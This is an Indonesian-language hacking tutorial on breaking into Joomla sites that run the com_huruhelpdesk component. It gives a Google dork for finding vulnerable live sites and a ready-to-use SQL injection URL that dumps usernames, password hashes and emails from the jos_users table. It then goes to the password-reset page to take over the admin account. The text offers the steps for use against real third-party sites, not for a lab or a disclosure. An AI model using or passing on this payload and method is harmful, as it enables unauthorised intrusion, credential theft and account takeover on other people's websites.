
ok langsung saja kita menuju step by step dalam pengerjaannya.
==========
[+] step 1
==========
Buka google.. ketik keyword :
Code:
"inurl:/index.php?option=com_huruhelpdesk\"
Atau silahkan ke sini untuk liat Exploitnya Databasenya : Exploit Database
Tes satu per satu
coba kita ambil yang ini :
==========
[+] step 2
==========
Pasang exploit..
/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7+from+jos_users--
Maka akan menghasilkan gambar seperti dibawah ini:
Nah kita akan melihat admin nya... :P
==========
[+] step 3
==========
Coba kita reset password nya :
/index.php?option=com_user&view=reset
hmmm... minta email dia.. masukin saja...